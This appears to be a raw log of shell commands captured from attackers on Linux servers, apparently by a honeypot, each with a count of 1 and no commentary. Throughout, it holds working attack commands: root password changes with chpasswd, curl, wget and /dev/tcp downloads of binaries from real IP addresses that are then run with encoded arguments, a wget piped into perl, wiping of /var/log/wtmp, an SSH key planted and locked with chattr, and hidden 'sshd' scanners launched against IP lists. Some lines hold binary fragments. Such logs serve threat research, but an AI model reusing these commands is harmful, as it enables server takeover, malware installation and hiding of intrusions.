ZUyZKKdGRI+VQEa/MZRVEh5cnC+5VEmViUNGpy6aWAYZWZ0lv0RAiopRQL4xn1gaBlqeMb9MS42LQEW/P5lfBhpYlTG+TF+Ji0ROvy+cXx8IWJoxu0BClYpEWrsslFYeGF2cLalARpWDQlq7L55CGRBflym5RUKDm0VDpy2ZXgYZXJUxvkVLjYtARL4/lUIaGVyDKrlaR46BR0S4LZtMEAZenCenRUOOlUNEuyWbXBkcW40rvlpDiIJfRb4tg1ofElqdLrlDUY+MX0a9LYNdGhBCny2zQkGKikJUvSiDXhwaQpwmvFpAj4hLQrkumVwIGV2bMbhDSZWJQEynLZ5eEh5cnC+8VEWMlUNHvjGVWgYZVJslv0RAj4xRQL4xlFwGGVmUMbpBS42LQEe5P5VCGRtfgyynRkOMgUdEuCucTBwfQp8ru1pDiI5fRbkpl1oYGV2bP71DX4mIR1q7L4NYERJanS67RFGPjF9GvSyDWRAGXZ4ps0JBiohDVL0og14cGkKYJ6dMRYGNQUW5Jo1YHwZemC2nRUCVjUFOvy+cXh4IWJoxu0FAlYlFWrgpnlYeGF2dK6lARpWMR1q/KYNeGRJanS65QlGPjF9GuiaDXRgbQpUlv0RAj4tRQL4xnF0ZBl2fKqdBQ4GNQUW7K41YHwZemS2nQkKVjUlOvy+cXR4IWJoxvkJfiYpAWrEnl1oYGV+cP7FaQ4qMX0a4MZxbHRJanS65TVGPjF9GvSyDXRofQpwruU5Hi4pFR6kunFsGG1+DLr5HX4qNQE6/L5xcHd0coP5eO61c59xP1+ENcPU2Jg==" & |
1 |
head -c 3610344 > /tmp/m7defy0wG2 |
1 |
echo "root:01bJCxyqlbVI"|chpasswd|bash |
1 |
nohup $SHELL -c "curl http://47.237.30.107:60122/linux -o /tmp/qmzJlLt5oF; if [ ! -f /tmp/qmzJlLt5oF ]; then wget http://47.237.30.107:60122/linux -O /tmp/qmzJlLt5oF; fi; if [ ! -f /tmp/qmzJlLt5oF ]; then exec 6<>/dev/tcp/47.237.30.107/60122 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/qmzJlLt5oF ; chmod +x /tmp/qmzJlLt5oF && /tmp/qmzJlLt5oF VESLlhweMgIfj4dKKCxUiY4eHTEdDoyESissUJ2JHBouFReChVQoKVSTjBkCMh8ZlotSNyhchYIYHDEYGZiCVio3UYSWHxo2Ah+Ph14vKVWCgA4YNwIWjp1QLzdXgIIYHDEdHZiHUzchUJ2JFxsuHhuKiVIpKFeGmBobLhQYloBTNyhRhIIYHDEfHJiHUzcoVoGWHx8wAh+JiVIpKFeCmBYCMh0eloZUNy9RiY4eHTIaDoyESisqUp2KHgI0FRSOg1UrKUSHjwAeMxsAi4NKKClTiY4eHTIeDoyESistVp2JHR0uHh6BiVIpKFaKmBobLh4djp1WLSpKgowdFjYcH4iBRCE3VoKPAB4xAh+Phl4vKVWDgQ4YNwIcjIFKKCpVnYwXFjYcH4mBRCgpVZ2KHhwuHR2InVYrL16FiB8dOQwaj51WKi9KgYweAjEcFI6DVSgtRIePAB4zFQCKg1E3K1SDghgcMR0cmIJUKDdWg4gAHTgbAIGCXi8pVYeODhg3AhyMgEooK1OdiRocOhoeiYdXOS1TnYkfHS4dHI2dUSsjUoOJHBggGBmWgVErN1WClhgcOhoeiYFSOShShpYfGTQCH4+CSigsU4mOHh0zFQ6MhEorKlKdih4CNBUUjoNVKylEh48AHjQeAImFSispXoWIHxg0DBiInVYpLEqCihgCMxUUjoNVLShEh48AFDYCH4+ESigtUYmOHh0wHw6KglU3KFCKlh8aMAIciYdeLylVh4AOHTAdAImBUjcoUp2KHxo6Gh6JgFM5LVOdih0aLh4aiJ1VKSNSg4kfGBXF87HIMdYd5glAoQxDTg==; fi; echo 12345678 > /tmp/.opass; chmod +x /tmp/qmzJlLt5oF && /tmp/qmzJlLt5oF VESLlhweMgIfj4dKKCxUiY4eHTEdDoyESissUJ2JHBouFReChVQoKVSTjBkCMh8ZlotSNyhchYIYHDEYGZiCVio3UYSWHxo2Ah+Ph14vKVWCgA4YNwIWjp1QLzdXgIIYHDEdHZiHUzchUJ2JFxsuHhuKiVIpKFeGmBobLhQYloBTNyhRhIIYHDEfHJiHUzcoVoGWHx8wAh+JiVIpKFeCmBYCMh0eloZUNy9RiY4eHTIaDoyESisqUp2KHgI0FRSOg1UrKUSHjwAeMxsAi4NKKClTiY4eHTIeDoyESistVp2JHR0uHh6BiVIpKFaKmBobLh4djp1WLSpKgowdFjYcH4iBRCE3VoKPAB4xAh+Phl4vKVWDgQ4YNwIcjIFKKCpVnYwXFjYcH4mBRCgpVZ2KHhwuHR2InVYrL16FiB8dOQwaj51WKi9KgYweAjEcFI6DVSgtRIePAB4zFQCKg1E3K1SDghgcMR0cmIJUKDdWg4gAHTgbAIGCXi8pVYeODhg3AhyMgEooK1OdiRocOhoeiYdXOS1TnYkfHS4dHI2dUSsjUoOJHBggGBmWgVErN1WClhgcOhoeiYFSOShShpYfGTQCH4+CSigsU4mOHh0zFQ6MhEorKlKdih4CNBUUjoNVKylEh48AHjQeAImFSispXoWIHxg0DBiInVYpLEqCihgCMxUUjoNVLShEh48AFDYCH4+ESigtUYmOHh0wHw6KglU3KFCKlh8aMAIciYdeLylVh4AOHTAdAImBUjcoUp2KHxo6Gh6JgFM5LVOdih0aLh4aiJ1VKSNSg4kfGBXF87HIMdYd5glAoQxDTg==" & |
1 |
head -c 3610344 > /tmp/Ex0QLHK2kS |
1 |
nohup $SHELL -c "curl http://101.126.16.216:60137/linux -o /tmp/hpmtMztKno; if [ ! -f /tmp/hpmtMztKno ]; then wget http://101.126.16.216:60137/linux -O /tmp/hpmtMztKno; fi; if [ ! -f /tmp/hpmtMztKno ]; then exec 6<>/dev/tcp/101.126.16.216/60137 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/hpmtMztKno ; chmod +x /tmp/hpmtMztKno && /tmp/hpmtMztKno NqO4DwpGb+VNZzR+Tf5tTg4RsbJKW7e3DwpBaeVNYjZ+RfJnQggQsLNbT7SuGQ5abPxKfjVgRv1tRQwUoLJPSK2xEg9abPpPfjNlRv1tRQsWoLdIVbKzEhZFZPhSYTZkRv1tRQwQoLJLSq2xEw5abP1SYjFmRv1tRQsWoLJJSK21FhZFa/1SYTdkRv1tRQkZoLdMVbGzFxZGaf5SYjNkRv1tRQoQoLdMVbGzGRZGZOVOZTRqSvtsRQsBtLRVQ7WuEBZHavFKYDFiSetpQxYZtq1JQ620FgJCbfpPYSBoUvlsQxYTsa1KTLa6FwhFbfJcZDd+TvhkWgkWs61KQ7u6FwhFbPJcZDN+TfhpWgkXsK1CSrm2EQlGaOtIZy5oSuVsQw4PsrNCQbWwEAtHff9LfjhmUvhuWgkYtblNS7KzERhAauVOYzZ+TvtzQAEbtrNKSbOgFQ9aav1SZzl+TvltTg4RsbdKW7e3DwBCc/5SYTdmRv1tRQkVoLJCSa2xFwBabPhSZjdqSvtsRwoBsbNKVbKyFxZFa+VOYTZqSvtsRw8BtLRVSbeyDwlCbOVEYDpmTPpvQRgQsbZVT7WuEAhMc/hEajZgTf9qVAwWrrpLVbK1GBZHaPFKYDFjTOtpRxYQsLNVSLGuEwBOa/tNYzNwSPxzRgsYrrRIVbKyGw5EbPhLcDRnUvlpRxYQsrRVSrewGw5EbP9PcDRnUvNuWgoTtq1IQ7m2EQlAZOtKYS5hSf5zQgkPsrJLQbWwEAtCffpIaC5hTfhzRggVrrVNQbWwEAhDMpCcA2UfOesIW08LdCBka10iHBNJtaA=; fi; echo password > /tmp/.opass; chmod +x /tmp/hpmtMztKno && /tmp/hpmtMztKno NqO4DwpGb+VNZzR+Tf5tTg4RsbJKW7e3DwpBaeVNYjZ+RfJnQggQsLNbT7SuGQ5abPxKfjVgRv1tRQwUoLJPSK2xEg9abPpPfjNlRv1tRQsWoLdIVbKzEhZFZPhSYTZkRv1tRQwQoLJLSq2xEw5abP1SYjFmRv1tRQsWoLJJSK21FhZFa/1SYTdkRv1tRQkZoLdMVbGzFxZGaf5SYjNkRv1tRQoQoLdMVbGzGRZGZOVOZTRqSvtsRQsBtLRVQ7WuEBZHavFKYDFiSetpQxYZtq1JQ620FgJCbfpPYSBoUvlsQxYTsa1KTLa6FwhFbfJcZDd+TvhkWgkWs61KQ7u6FwhFbPJcZDN+TfhpWgkXsK1CSrm2EQlGaOtIZy5oSuVsQw4PsrNCQbWwEAtHff9LfjhmUvhuWgkYtblNS7KzERhAauVOYzZ+TvtzQAEbtrNKSbOgFQ9aav1SZzl+TvltTg4RsbdKW7e3DwBCc/5SYTdmRv1tRQkVoLJCSa2xFwBabPhSZjdqSvtsRwoBsbNKVbKyFxZFa+VOYTZqSvtsRw8BtLRVSbeyDwlCbOVEYDpmTPpvQRgQsbZVT7WuEAhMc/hEajZgTf9qVAwWrrpLVbK1GBZHaPFKYDFjTOtpRxYQsLNVSLGuEwBOa/tNYzNwSPxzRgsYrrRIVbKyGw5EbPhLcDRnUvlpRxYQsrRVSrewGw5EbP9PcDRnUvNuWgoTtq1IQ7m2EQlAZOtKYS5hSf5zQgkPsrJLQbWwEAtCffpIaC5hTfhzRggVrrVNQbWwEAhDMpCcA2UfOesIW08LdCBka10iHBNJtaA=" & |
1 |
head -c 3815748 > /tmp/Vz7ZwBiwIk |
1 |
echo "root:VKxRLSSLNg0g"|chpasswd|bash |
1 |
echo "root:rgsO1Iep97cj"|chpasswd|bash |
1 |
echo "root:xMlGmI4l3Y84"|chpasswd|bash |
1 |
uname -m || busybox uname -m || cat /proc/cpuinfo |
1 |
curl http://xtibh.com/d/EER6Es -o /tmp/1.sh |
1 |
wget http://xtibh.com/d/EER6Es -O /tmp/1.sh |
1 |
chmod +x /tmp/1.sh |
1 |
/tmp/1.sh |
1 |
rm -f /tmp/1.sh |
1 |
echo > /var/log/wtmp |
1 |
exit |
1 |
echo "root:w0KEPgZZ5H0M"|chpasswd|bash |
1 |
echo "root:U2Klrqy6KRBf"|chpasswd|bash |
1 |
echo "root:uB4QoXa6Ryri"|chpasswd|bash |
1 |
echo "root:LFbwMtu8WhYf"|chpasswd|bash |
1 |
nohup bash -c "exec 6<>/dev/tcp/47.239.194.58/60146 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/svZ4jwnxbC && chmod +x /tmp/svZ4jwnxbC && /tmp/svZ4jwnxbC S7JCdDR0QrFIUbRUdTpwXLRLR6VUaDJ3W6tNTbJCdzJ1VrNPTrZZZjR1QrRPT6tdcy53WbVFSbVddzVmWLJRTbFeaDl0QrBNRbNcdzRwTLFIUbdfcS53XqtOT79adjFyXqVLSKtedTloXrFKUbBdfDZ2XbZLX7FbaDh1Qr1RTr1VfDZ2XbFHX7FfaDF0VKtOSrVCdDBwVrNPTrFYZjRxQrdMRqtedzhoWL1FSbVdcjNmWLJRTbZVaDF/WKtKR79adjFyWqVOT7ZCdzB3QrRKTKtecTpwXLRPT6VYdS53XLVRSL1CdDB/VrNPTrZbY/QscEs2QHEcCQ==" & |
1 |
dd bs=1 count=1911588 > /tmp/AtaQFZYZIq |
1 |
nohup bash -c "exec 6<>/dev/tcp/47.239.194.58/60146 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/svZ4jwnxbC && chmod +x /tmp/svZ4jwnxbC && /tmp/svZ4jwnxbC S7JCdDR0QrFIUbRUdTpwXLRLR6VUaDJ3W6tNTbJCdzJ1VrNPTrZZZjR1QrRPT6tdcy53WbVFSbVddzVmWLJRTbFeaDl0QrBNRbNcdzRwTLFIUbdfcS53XqtOT79adjFyXqVLSKtedTloXrFKUbBdfDZ2XbZLX7FbaDh1Qr1RTr1VfDZ2XbFHX7FfaDF0VKtOSrVCdDBwVrNPTrFYZjRxQrdMRqtedzhoWL1FSbVdcjNmWLJRTbZVaDF/WKtKR79adjFyWqVOT7ZCdzB3QrRKTKtecTpwXLRPT6VYdS53XLVRSL1CdDB/VrNPTrZbY/QscEs2QHEcCQ==" &0O0O6(6(Qtd?UPX! |
1 |
echo "root:t6LY5fJT1uoO"|chpasswd|bash |
1 |
wget -nc http://103.41.204.104/k.php?a=x86_64,K5734T30F216A02YH -O ./upnpsetup |
1 |
echo "root:9gRoOLO4Evjj"|chpasswd|bash |
1 |
echo "root:kZCQHR4SE4pt"|chpasswd|bash |
1 |
echo "root:34VSDC2o8ehD"|chpasswd|bash |
1 |
chmod +x ./.5397918528410996427/sshd;nohup ./.5397918528410996427/sshd 107.150.121.86 41.225.238.233 120.26.216.62 116.128.243.59 47.84.77.51 199.15.79.27 47.99.147.36 88.151.34.37 157.255.155.179 59.92.68.93 41.228.66.69 62.60.232.169 94.141.100.123 103.145.145.79 199.15.79.168 103.104.169.53 1.62.252.20 163.172.34.113 112.1.17.71 120.210.105.58 8.217.13.52 175.6.180.112 8.130.39.120 188.43.199.85 103.145.145.82 161.97.126.109 101.91.181.235 182.66.193.215 39.164.232.214 212.113.112.96 159.203.90.99 120.79.95.224 113.7.221.72 46.235.84.183 103.87.67.48 121.18.43.102 161.97.79.146 125.124.215.61 111.12.131.236 188.168.87.142 209.141.45.178 222.187.225.7 101.36.228.201 8.135.238.15 45.58.126.179 211.186.188.200 89.175.253.49 47.79.43.177 157.15.9.187 193.34.212.145 146.103.47.42 & |
1 |
X="chmod +x clean.sh; sh clean.sh; rm -rf clean.sh; chmod +x setup.sh; sh setup.sh; rm -rf setup.sh; mkdir -p ~/.ssh; chattr -ia ~/.ssh/authorized_keys; echo \"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCqHrvnL6l7rT/mt1AdgdY9tC1GPK216q0q/7neNVqm7AgvfJIM3ZKniGC3S5x6KOEApk+83GM4IKjCPfq007SvT07qh9AscVxegv66I5yuZTEaDAG6cPXxg3/0oXHTOTvxelgbRrMzfU5SEDAEi8+ByKMefE+pDVALgSTBYhol96hu1GthAMtPAFahqxrvaRR4nL4ijxOsmSLREoAb1lxiX7yvoYLT45/1c5dJdrJrQ60uKyieQ6FieWpO2xF6tzfdmHbiVdSmdw0BiCRwe+fuknZYQxIC1owAj2p5bc+nzVTi3mtBEk9rGpgBnJ1hcEUslEf/zevIcX8+6H7kUMRr rsa-key-20230629\" > ~/.ssh/authorized_keys; chattr +ai ~/.ssh/authorized_keys"; shell=""; if [ -z ${SHELL+x} ]; then shell="sh"; else shell="$SHELL"; fi; if command -v nohup || type nohup; then nohup $shell -c "$X" >/dev/null; else $shell -c "$X"; fi; uname -a; echo -e "\x61\x75\x74\x68\x5F\x6F\x6B\x0A" |
1 |
echo "root:offrKQoXMlXY"|chpasswd|bash |
1 |
echo "root:qrAuKR83Ov5V"|chpasswd|bash |
1 |
echo "root:VCa7vqkR5jsw"|chpasswd|bash |
1 |
echo "root:yLGL46h4zrFd"|chpasswd|bash |
1 |
htop |
1 |
nohup $SHELL -c "curl http://101.126.16.216:60137/linux -o /tmp/ooBUGej3Hr; if [ ! -f /tmp/ooBUGej3Hr ]; then wget http://101.126.16.216:60137/linux -O /tmp/ooBUGej3Hr; fi; if [ ! -f /tmp/ooBUGej3Hr ]; then exec 6<>/dev/tcp/101.126.16.216/60137 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/ooBUGej3Hr ; chmod +x /tmp/ooBUGej3Hr && /tmp/ooBUGej3Hr A4wQoz2Qa7/kCmMBh1nj6VqGHmYM9aVujD24HIJ/fJoGtDaYb6HkDWcPglv94V+AAWUN+6VgmDm9GZ5+bpgfoz2Rbr/kD2UBh1nm6VqGHmUF9al3kzu8BpV7YJ0QvDWUaaDnCncbgULh4FuYF2cT5KVpmDm9GZ54bpgfoz2Rb7/nCWQBh1jg6VqGHmcP9ahrjD68EIJ8fZkGvz2aY6flDGYell3k5kKAAWQP+6NolzW7GJ1+e4wcuiGQaqb7DmcBh1zk6VqGHmUP9aVujD24GoJ9e4IRvTWUaaDnCncej1794EKPHXkF4qtvkj69HIx8fp4GuDqMYaP7D2IfjFrj4liGD28T5KJqjDyjGp55dJoYvDuTeaDlDHkehFr94lqYHWYL76dpkzy6CJh5YJseoz6Rab/sC20Zhl3j5EyCGHkP4KN3lTajHpx0eJwZvzaCbab7BWEBh1vl/VmGFWEN5KVsgju6Bp59doIavzuMYKHvC2cehF7z60KEHm8T4al3kD21Epp+f5gbrTuVd6bjE2EYmF/i6VqGHmcM9al3kzy1Bp18fIIZuT6Yb6HkCWMPglv94VmEAWQI+6hpmDm9GZ55bpgfoz2Rbr/kD2UBh1nm6VqGHmUF9aBulyG5GoJ9fYIZuzyYb6HkCWUPglv94VmEAWAE+6dpmDm9GZ53bp4YvyGXbL/tD3kdg1zp5VyHG2cd4aZ3kDu+Bp59YJ8QtzmSaKLiHW4dmF3i60KEHGIT56NhmDm9GZ1/bpgfoz2Rbr/tDXkeglzp5VyHHWEASjNBWwXVr8Cfaz17DdwPYc0SPKIVPoynVMwb5k5MUg==; fi; echo 12345678 > /tmp/.opass; chmod +x /tmp/ooBUGej3Hr && /tmp/ooBUGej3Hr A4wQoz2Qa7/kCmMBh1nj6VqGHmYM9aVujD24HIJ/fJoGtDaYb6HkDWcPglv94V+AAWUN+6VgmDm9GZ5+bpgfoz2Rbr/kD2UBh1nm6VqGHmUF9al3kzu8BpV7YJ0QvDWUaaDnCncbgULh4FuYF2cT5KVpmDm9GZ54bpgfoz2Rb7/nCWQBh1jg6VqGHmcP9ahrjD68EIJ8fZkGvz2aY6flDGYell3k5kKAAWQP+6NolzW7GJ1+e4wcuiGQaqb7DmcBh1zk6VqGHmUP9aVujD24GoJ9e4IRvTWUaaDnCncej1794EKPHXkF4qtvkj69HIx8fp4GuDqMYaP7D2IfjFrj4liGD28T5KJqjDyjGp55dJoYvDuTeaDlDHkehFr94lqYHWYL76dpkzy6CJh5YJseoz6Rab/sC20Zhl3j5EyCGHkP4KN3lTajHpx0eJwZvzaCbab7BWEBh1vl/VmGFWEN5KVsgju6Bp59doIavzuMYKHvC2cehF7z60KEHm8T4al3kD21Epp+f5gbrTuVd6bjE2EYmF/i6VqGHmcM9al3kzy1Bp18fIIZuT6Yb6HkCWMPglv94VmEAWQI+6hpmDm9GZ55bpgfoz2Rbr/kD2UBh1nm6VqGHmUF9aBulyG5GoJ9fYIZuzyYb6HkCWUPglv94VmEAWAE+6dpmDm9GZ53bp4YvyGXbL/tD3kdg1zp5VyHG2cd4aZ3kDu+Bp59YJ8QtzmSaKLiHW4dmF3i60KEHGIT56NhmDm9GZ1/bpgfoz2Rbr/tDXkeglzp5VyHHWEASjNBWwXVr8Cfaz17DdwPYc0SPKIVPoynVMwb5k5MUg==" & |
1 |
head -c 3610344 > /tmp/xjK8DtCyQi |
1 |
echo "root:L4uC6qgRFrfP"|chpasswd|bash |
1 |
chmod +x ./.2814407819108315837/sshd;nohup ./.2814407819108315837/sshd 123.1.186.239 121.54.188.168 39.164.232.214 185.22.155.56 8.245.24.52 113.7.221.72 103.9.78.11 66.59.198.52 124.222.68.65 217.18.210.86 116.128.243.59 31.57.159.185 152.42.211.226 185.238.74.98 160.202.248.51 125.87.81.229 188.166.211.175 223.75.204.39 217.197.97.175 103.123.5.235 42.121.57.140 117.50.184.156 8.217.13.52 167.114.180.31 95.164.46.175 161.248.66.117 125.94.40.184 148.72.168.29 41.225.238.233 58.22.105.66 111.12.131.236 101.36.228.201 158.51.96.38 140.120.148.238 80.242.208.68 158.220.104.193 149.33.235.185 47.79.147.66 103.218.241.53 171.244.22.39 178.128.39.137 122.152.214.108 38.7.207.148 52.91.199.247 37.238.10.123 103.145.145.73 188.168.87.142 116.62.60.152 47.79.43.177 115.190.11.194 103.188.82.254 & |
1 |
echo "root:cJjbk9KwchZs"|chpasswd|bash |
1 |
echo "root:s2RBcZEm0hkA"|chpasswd|bash |
1 |
chmod +x ./.5157946065164321294/sshd;nohup ./.5157946065164321294/sshd 80.251.210.95 158.51.96.38 196.70.241.182 125.87.92.51 41.249.210.60 125.87.95.28 149.12.246.21 125.87.84.97 103.117.141.8 125.87.94.26 125.87.80.86 113.7.221.72 125.87.90.97 125.87.82.81 125.87.88.156 125.87.89.81 125.87.87.156 8.219.129.249 125.87.85.240 125.87.81.173 125.87.85.70 196.89.45.180 160.178.78.36 125.87.89.215 125.87.83.127 125.87.89.117 125.87.80.171 125.87.83.91 125.87.80.46 125.87.82.78 125.87.81.181 125.87.82.124 125.87.95.235 125.87.84.73 196.89.61.57 125.87.87.197 34.16.229.52 125.87.94.71 125.87.87.38 41.249.214.211 160.178.236.107 13.235.8.21 125.87.82.238 45.142.179.151 160.178.246.94 125.87.81.101 125.87.84.29 125.87.89.36 105.155.225.11 125.87.80.21 125.87.85.110 & |
1 |
echo "root:DUeyIunrpue1"|chpasswd|bash |
1 |
echo "root:EZsZ541bG4Im"|chpasswd|bash |
1 |
echo "root:34b2NpwSkapv"|chpasswd|bash |
1 |
echo "root:AJp7U9oZCGJ6"|chpasswd|bash |
1 |
echo "root:N5hNLuPAu1mT"|chpasswd|bash |
1 |
echo "root:LXHVOVdiHjVn"|chpasswd|bash |
1 |
nohup bash -c "exec 6<>/dev/tcp/47.237.99.250/60111 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/vMFCbs9w8U && chmod +x /tmp/vMFCbs9w8U && /tmp/vMFCbs9w8U QWxuICFuakdNdXYiLXZrREVpYCMgbmlGTHVyJSBuakBEYXYnJnNuVUFsbi8kbmlEW2h6ISdxb0ZVanYgOXliW0RieTkldG1PQ2txJyRgY1tHa3k5JXVpW0Rucy0hcGpFTHt0IDlyb0dbYnI5InJhQ0VqdCE3eHVHRGJuJiJ4dURHaXohJ3FvRlVvdzklc2xbTGJuJSJwYUNFanEmN3RsW0dvczkmc2NbR2l4LSFwakRAe3QgOXJvR1tvdzkmeGhPQ2txIy9gb0JbaXMuOXJpTFtqciItdmtERWhoC80vOI1QHQg=" & |
1 |
dd bs=1 count=1911588 > /tmp/3Fgj6oURBL |
1 |
nohup bash -c "exec 6<>/dev/tcp/47.237.99.250/60111 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/vMFCbs9w8U && chmod +x /tmp/vMFCbs9w8U && /tmp/vMFCbs9w8U QWxuICFuakdNdXYiLXZrREVpYCMgbmlGTHVyJSBuakBEYXYnJnNuVUFsbi8kbmlEW2h6ISdxb0ZVanYgOXliW0RieTkldG1PQ2txJyRgY1tHa3k5JXVpW0Rucy0hcGpFTHt0IDlyb0dbYnI5InJhQ0VqdCE3eHVHRGJuJiJ4dURHaXohJ3FvRlVvdzklc2xbTGJuJSJwYUNFanEmN3RsW0dvczkmc2NbR2l4LSFwakRAe3QgOXJvR1tvdzkmeGhPQ2txIy9gb0JbaXMuOXJpTFtqciItdmtERWhoC80vOI1QHQg=" &0O0O6(6(Qtd?UPX! |
1 |
whoami && hostname |
1 |
nohup $SHELL -c "curl http://47.237.86.186:60147/linux -o /tmp/kslzeAQaKu; if [ ! -f /tmp/kslzeAQaKu ]; then wget http://47.237.86.186:60147/linux -O /tmp/kslzeAQaKu; fi; if [ ! -f /tmp/kslzeAQaKu ]; then exec 6<>/dev/tcp/47.237.86.186/60147 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/kslzeAQaKu ; chmod +x /tmp/kslzeAQaKu && /tmp/kslzeAQaKu GeUVsjKuH+tlY/EDrTWsF/NkZfQcvDSrA/dhYOscrjayFPxuYvUcrDC8GfJ6bPYDrjKqA/ZsbvMdrTSlDfFjevIbsjaqA/dlbvMdrTCqDfFjev0esjGuGetlZvQXqjCtHfB0Zf0dsjKtHOtlZ/IDpTqqHfRkZuUZqy6uGfZ6ZvYDrzimG/VlZ/INqDeyH/ZjevYdsjGsGv9iZPQfriCoGutmYPYDrTKrA/RgZP8brDGoHuVlevYdsjGqGOttZv8brDGtHuVgY+sVry6uHfx6bPwXqjCtHvR0YPIDrjOrA/1ievQVqjqqHfRgY+UZqy6uGPd6ZfQDqjCmG/VlZvMNqDeyH/Zjev0dsjGoHf9iZPQfqiCoGutmZ/MDrjSlA/1lbvMdrTKvDfFjevQdqC6tG/V6YPcXqjCtHPx0bfYDrTWuA/dkY+sfqDOmG/VlZ/0NqDeyGvN6ZvQcsjikF/NkZfYcvDSrA/1nevcfqi6vFf9iZPQZpSCoGutmZ/wDrjCpA/dkZP8brDGtH+Vsevccqy6uHOtlY/AXqjCtHfx0YPIDpDayHOtnY/8brDGuGOVgY+sfqDOyFPR6ZfIXqjCtHvF0YPIDrjOlA/RkZ+sVpjasHPFkdPEasjGsGetlYvUDqDKmG/VlZfwNpC6uHP16ZfcYsjKsH/9iZPQZqyCoGutlZvcDrTOsA/RlbvMdrTOtDfFjevcYri6vGOttZP8brDGuGuVgY+sfqDKyHPZlevcdpTqqHfRmbeUZqy6uGPF6YvwDrTOvF/NkZfYYXL5oZoD6RXsIMjs=; fi; echo 12345678 > /tmp/.opass; chmod +x /tmp/kslzeAQaKu && /tmp/kslzeAQaKu GeUVsjKuH+tlY/EDrTWsF/NkZfQcvDSrA/dhYOscrjayFPxuYvUcrDC8GfJ6bPYDrjKqA/ZsbvMdrTSlDfFjevIbsjaqA/dlbvMdrTCqDfFjev0esjGuGetlZvQXqjCtHfB0Zf0dsjKtHOtlZ/IDpTqqHfRkZuUZqy6uGfZ6ZvYDrzimG/VlZ/INqDeyH/ZjevYdsjGsGv9iZPQfriCoGutmYPYDrTKrA/RgZP8brDGoHuVlevYdsjGqGOttZv8brDGtHuVgY+sVry6uHfx6bPwXqjCtHvR0YPIDrjOrA/1ievQVqjqqHfRgY+UZqy6uGPd6ZfQDqjCmG/VlZvMNqDeyH/Zjev0dsjGoHf9iZPQfqiCoGutmZ/MDrjSlA/1lbvMdrTKvDfFjevQdqC6tG/V6YPcXqjCtHPx0bfYDrTWuA/dkY+sfqDOmG/VlZ/0NqDeyGvN6ZvQcsjikF/NkZfYcvDSrA/1nevcfqi6vFf9iZPQZpSCoGutmZ/wDrjCpA/dkZP8brDGtH+Vsevccqy6uHOtlY/AXqjCtHfx0YPIDpDayHOtnY/8brDGuGOVgY+sfqDOyFPR6ZfIXqjCtHvF0YPIDrjOlA/RkZ+sVpjasHPFkdPEasjGsGetlYvUDqDKmG/VlZfwNpC6uHP16ZfcYsjKsH/9iZPQZqyCoGutlZvcDrTOsA/RlbvMdrTOtDfFjevcYri6vGOttZP8brDGuGuVgY+sfqDKyHPZlevcdpTqqHfRmbeUZqy6uGPF6YvwDrTOvF/NkZfYYXL5oZoD6RXsIMjs=" & |
1 |
head -c 3610344 > /tmp/gxklSzElEo |
1 |
echo "root:gMCYWcdhDPfg"|chpasswd|bash |
1 |
echo "root:LPZ3YqgbhyBY"|chpasswd|bash |
1 |
echo "root:AJRJrN3121BP"|chpasswd|bash |
1 |
cat /bin/echo |
1 |
nohup bash -c "exec 6<>/dev/tcp/8.219.255.88/60133 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/lHo5DPjaGN && chmod +x /tmp/lHo5DPjaGN && /tmp/lHo5DPjaGN 2pEJ6RuRjhbvFoCjq58K7RiJjxPrD5GjtYMJ7AyNihL1AIOhrYEJ7xqfjhTjFoCqop8J7BGRixrhDoGqr4MY4wyNjhv1CoWptYMJ4RSPjhPuGIWstYML7AyOixL1CYKhrYEJ7xKfhwzpCYi1qYUN9ROJihjtCICro5EM7AyNjBX1CYKttYYC7RKOjhP7AJ+pqogW6ReKkRrjAoerqoIL+xaIkRDoD5+qr4AW6BaFiRLqC4G7r4YW6RGIkRPvCZ+pr4IC7RKOjhT7AJ+pqogW6huNkRPvCYutq4AI4gKHkRDqAZ+pr4kW4hOFiRLqC4W7o58K6RCRjRHqFoCioYcI6hKGnxbsFoOorZ8L7QyNihLhDoGqq4EY4wyNjhv1CYmttYAI6hiJjxPvCJGjtYMJ4gyNixL1CYmroYcI6hCInxbsFoOorJ8J7xKRjRThDoGqq4cY7xWRjRHsFoCoo58P7BiJjxPpAZGjtYMK6QyOhxr1DYShrYEJ6BWfhwzpCYi1qocK9RCPihjtCICqqJEM7AyNjBX1CYKttYMN6xiJjxPvCZGvrJ8K6BWRjhHqFoOvo4sO6xOPigLvD5+pqIYW4hWRjhHiAoerqoAO+xqRjRDpFoCio58J7xSFiRLqCoe7o58K6huRjRbuFoCuqYsO6xOOhwLvD5+pqIYW6haNkRPoCoutq4AK7wKLiAzpC4a1rIIW7RGFiRLqCoO7r4YW4xGRjBP1CoGpoYcI6hOOnxbsFoOorJ8J6BORiRDhDoGqq4EY4wyNjhv1CoWutYAO7hiJjxPrACxsnV0Yf8A6hqXdt9/T" & |
1 |
head -c 1458464 > /tmp/acj19ZWbrx |
1 |
cat /bin/echoQtd#UPX! |
1 |
>yoA@/;'8ELFP;i2 |
1 |
echo "root:wUJcXCbTRc2B"|chpasswd|bash |
1 |
echo "root:3O9QWDtbU9L5"|chpasswd|bash |
1 |
mount | head -5 |
1 |
echo "root:pY8tSRxxJAF7"|chpasswd|bash |
1 |
echo "root:BezJpfnwzV6o"|chpasswd|bash |
1 |
chmod 777 zsvc |
1 |
chmod 777 upnpsetup |
1 |
sudo ./zsvc |
1 |
./zsvc |
1 |
echo "root:xjyjALT52NBq"|chpasswd|bash |
1 |
uname -a ; wget -qO - http://61.14.210.71/.j/sus|perl |
1 |
chmod +x ./.5465900481144028310/sshd;nohup ./.5465900481144028310/sshd & |
1 |
chmod +x ./.8217203188501373667/sshd;nohup ./.8217203188501373667/sshd 147.93.103.172 & |
1 |
